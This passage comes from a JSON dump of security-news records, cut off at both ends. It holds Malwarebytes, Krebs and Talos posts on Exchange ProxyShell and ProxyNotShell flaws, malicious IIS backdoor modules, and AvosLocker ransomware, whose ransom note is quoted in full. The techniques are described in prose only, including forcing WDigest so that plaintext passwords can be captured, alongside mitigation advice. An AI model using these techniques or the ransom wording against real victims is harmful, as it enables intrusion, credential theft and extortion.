The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! 
Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly 
leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. 
The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. 
Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prices and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several things you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS server suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. 
It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker 
ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. 
The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service, which of the vulnerabilities gets used may depend on the affiliate.\n\nThe Exchange Server vulnerabilities are: CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. 
This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-10-03T06:04:32", "description": "**Microsoft Corp.** is investigating reports that attackers are exploiting two previously unknown vulnerabilities in **Exchange Server**, a technology many organizations rely on to send and receive email. Microsoft says it is expediting work on software patches to plug the security holes. 
In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.\n\n\n\nIn [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040>), is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability -- [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>) -- which allows remote code execution (RCE) when **PowerShell** is accessible to the attacker.\n\nMicrosoft said **Exchange Online** has detections and mitigation in place to protect customers. Customers using _on-premises_ Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.\n\nVietnamese security firm **GTSC** on Thursday [published a writeup on the two Exchange zero-day flaws](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), saying it first observed the attacks in early August being used to drop "webshells." These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.\n\n"We detected webshells, mostly obfuscated, being dropped to Exchange servers," GTSC wrote. "Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. 
We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese."\n\nGTSC's advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.\n\nIn March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to [four zero-day vulnerabilities in Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>). \n\nGranted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year's Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers. \n\nMicrosoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server. \n\n**Steven Adair** is president of [Volexity](<https://www.volexity.com>), the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC's writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials. 
\n\nIn February 2022, Volexity [warned](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>) that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the **Zimbra Collaboration Suite**, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging. \n\nIf your organization runs Exchange Server, please consider reviewing [the Microsoft mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and [the GTSC post-mortem](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on their investigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:51:57", "type": "krebs", "title": "Microsoft: Two New 0-Day Flaws in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:51:57", "id": "KREBS:6E25B247DFBFC9267C00F36CE0695768", "href": "https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-13T06:06:48", "description": "Let's face it: Having \u201c2022 election\u201d in the headline above is probably the only reason anyone might read this story today. 
Still, while most of us here in the United States are anxiously awaiting the results of how well we've patched our Democracy, it seems fitting that **Microsoft Corp.** today released gobs of security patches for its ubiquitous **Windows** operating systems. November's patch batch includes fixes for _a whopping six zero-day security vulnerabilities_ that miscreants and malware are already exploiting in the wild.\n\n\n\nProbably the scariest of the zero-day flaws is [CVE-2022-41128](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41128>), a "critical" weakness in the Windows scripting languages that could be used to foist malicious software on vulnerable users who do nothing more than browse to a hacked or malicious site that exploits the weakness. Microsoft credits **Google** with reporting the vulnerability, which earned a CVSS score of 8.8.\n\n[CVE-2022-41073](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073>) is a zero-day flaw in the **Windows Print Spooler**, a Windows component that Microsoft has patched mightily over the past year. **Kevin Breen**, director of cyber threat research at **Immersive Labs**, noted that the print spooler has been a popular target for vulnerabilities in the last 12 months, with this marking the 9th patch.\n\nThe third zero-day Microsoft patched this month is [CVE-2022-41125](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41125>), which is an "elevation of privilege" vulnerability in the Windows Cryptography API: Next Generation (CNG) Key Isolation Service, a service for isolating private keys. **Satnam Narang**, senior staff research engineer at **Tenable**, said exploitation of this vulnerability could grant an attacker SYSTEM privileges.\n\nThe fourth zero-day, [CVE-2022-41091](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41091>), was previously disclosed and widely reported on in October. 
It is a Security Feature Bypass of \u201cWindows Mark of the Web\u201d \u2013 a mechanism meant to flag files that have come from an untrusted source.\n\nThe other two zero-day bugs Microsoft patched this month were for vulnerabilities being exploited in **Exchange Server**. News that these two Exchange flaws were being exploited in the wild [surfaced in late September 2022](<https://krebsonsecurity.com/2022/09/microsoft-two-new-0-day-flaws-in-exchange-server/>), and many were surprised when Microsoft let October's Patch Tuesday sail by without issuing official patches for them (the company instead issued mitigation instructions that it was forced to revise multiple times). Today's patch batch addresses both issues.\n\n**Greg Wiseman**, product manager at **Rapid7**, said the Exchange flaw [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040>) is a \u201ccritical\u201d elevation of privilege vulnerability, and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082>) is considered Important, allowing Remote Code Execution (RCE) when PowerShell is accessible to the attacker.\n\n"Both vulnerabilities have been exploited in the wild," Wiseman said. "Four other CVEs affecting Exchange Server have also been addressed this month. Three are rated as Important, and [CVE-2022-41080](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41080>) is another privilege escalation vulnerability considered Critical. Customers are advised to update their Exchange Server systems immediately, regardless of whether any previously recommended mitigation steps have been applied. The mitigation rules are no longer recommended once systems have been patched."\n\n**Adobe** usually issues security updates for its products on Patch Tuesday, but it did not this month. 
For a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+November+2022+Patch+Tuesday/29230/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T01:50:14", "type": "krebs", "title": "Patch Tuesday, November 2022 Election Edition", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41073", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41091", "CVE-2022-41125", "CVE-2022-41128"], "modified": "2022-11-09T01:50:14", "id": "KREBS:E910A9996E07E6C63E0C32D6520D0F25", "href": "https://krebsonsecurity.com/2022/11/patch-tuesday-november-2022-election-edition/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-10-28T20:49:32", "description": "\n\nAs I [wrote about last week](<https://blog.talosintelligence.com/2022/09/threat-source-newsletter-sept-29-2022.html>), I've been [diving a lot into apps' privacy policies 
recently](<https://blog.talosintelligence.com/2022/09/our-current-world-health-care-apps-and.html>). And I was recently made aware of a new type of app I never knew existed -- family trackers.\n\nThere are countless mobile apps for parents to track their children or other family members based on their location, phone usage, and even driving speed. As an anxious soon-to-be-parent, this sounds intriguing to me -- it'd be a souped-up version of Find my Friends on Apple devices so I'd never have to ask my teenager (granted, I'm many years away from being at that stage of my life) when they were coming home or where they were.\n\nJust as with all other types of mobile apps, there are pitfalls, though.\n\nLife360, one of the most popular of these types of apps, which even tells users what their maximum driving speed was on a given trip, was found in December 2021 to be [selling precise location data on its users](<https://themarkup.org/privacy/2021/12/06/the-popular-family-safety-app-life360-is-selling-precise-location-data-on-its-tens-of-millions-of-user>), potentially affecting millions of people. Once that precise location data is out there, there is no telling who could eventually get a hold of it. Even if Life360 doesn't intend to let adversaries see this information, they don't have direct control over how those third parties handle the information once it's sold off.\n\nThe [app's current and updated privacy policy](<https://support.life360.com/hc/en-us/articles/360043228154-Full-Privacy-Policy>) states that it \"may also share location information with our partners, such as Cuebiq and its Partners, for tailored advertising, attribution, analytics, research and other purposes," though users do have the ability to opt out of this inside the app.\n\nThere is hardware that offers this same type of tracking. 
Jealous, angry or paranoid spouses and parents have [used Apple's AirTags in the past to unknowingly track people](<https://www.npr.org/2022/02/18/1080944193/apple-airtags-theft-stalking-privacy-tech>), eventually to the point that Apple had to [address the issue directly](<https://www.apple.com/newsroom/2022/02/an-update-on-airtag-and-unwanted-tracking/>) and provide several updates to AirTags' security and precise location alerts to make it easier for users to find potentially unwanted AirTags on their cars or personal belongings.\n\nThis is truthfully just an area of concern I had never considered before. Many parents would do anything for their children's safety, which is certainly understandable. But just like personal health apps, we need to consider the security trade-offs here, too. As we've said before, [no one truly has "nothing to hide,"](<https://beerswithtalos.talosintelligence.com/2033817/11128173-beers-with-talos-ep-124-there-s-no-such-thing-as-i-have-nothing-to-hide>) especially when it comes to minors or vulnerable populations. I'm not saying using any of these apps is inherently wrong, or that AirTags do not have their legitimate purposes. But any time we welcome this software and hardware into our homes and on our devices, it's worth considering what sacrifices we might be making elsewhere. \n\n\n## The one big thing\n\n[Microsoft warned last week](<https://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html>) of the exploitation of two recently disclosed vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. 
CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.\n\n## Top security headlines from the week \n\n\nMore than 2 million Australians' personal information is at risk after a data breach at telecommunications giant Optus. More than 1.2 million customers have had at least one ID number from a current and valid form of identification exposed, along with other personal data, according to an update from the company's CEO. Adding to the confusion, the company told many residents in New South Wales that it would need to replace their driver's license, only to later backtrack to say that would not be the case for everyone affected. Optus says it enlisted a third party to complete a thorough review of the compromise to identify security gaps and any other potential fallout. ([ABC News](<https://www.abc.net.au/news/2022-10-03/optus-data-breach-cyber-attack-deloitte-review-audit/101496190>), [Nine News](<https://www.9news.com.au/national/optus-data-breach-update-more-than-two-million-customer-identity-details-exposed/b92b17d9-fc77-430b-94ca-21def7fea61d>))\n\nThe Vice Society ransomware group leaked more than 500 GB worth of data on employees and students at the Los Angeles Unified School District after the district refused to pay a requested extortion payment following a ransomware attack several weeks ago. Officials said the leak was less extensive than originally expected and limited to attendance and academic records from 2013 - 2016. The district declined to pay the ransom because there was no guarantee that the actors would not leak the information anyway. Threat actors have commonly targeted the education sector with ransomware attacks as the school year started and their networks were particularly vulnerable. 
([Axios](<https://www.axios.com/2022/10/03/hackers-stolen-data-la-school-district-ransomware>), [Los Angeles Times](<https://www.latimes.com/california/story/2022-10-03/hackers-cyberattack-los-angeles-unified-school-district-hotline-parents-staff-vice-society>))\n\nThe infamous Lazarus Group threat actor continues to ramp up its activity, recently exploiting open-source software and Dell hardware to target companies all over the globe. A recent report from Microsoft found that the group was impersonating contributors to open-source projects and injecting malicious updates for that software to users. In a separate campaign, the APT also used an exploit in a Dell firmware driver to deliver a Windows rootkit targeting an aerospace company and high-profile journalist in Belgium. Lazarus Group is known for operating with North Korean state interests, often stealing cryptocurrency or finding other ways to earn money. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/>), [Security Affairs](<https://securityaffairs.co/wordpress/136623/apt/lazarus-exploit-dell-firmware-driver.html>))\n\n## Can't get enough Talos?\n\n * [Developer account body snatchers pose risks to the software supply chain](<https://blog.talosintelligence.com/2022/10/developer-account-body-snatchers-pose.html>)\n * [Researcher Spotlight: Globetrotting with Yuri Kramarz](<https://blog.talosintelligence.com/2022/10/researcher-spotlight-globetrotting-with.html>)\n * [Threat Roundup for Sept. 23 - 30](<https://blog.talosintelligence.com/2022/09/threat-roundup-0923-0930.html>)\n * [Talos Takes Ep. 
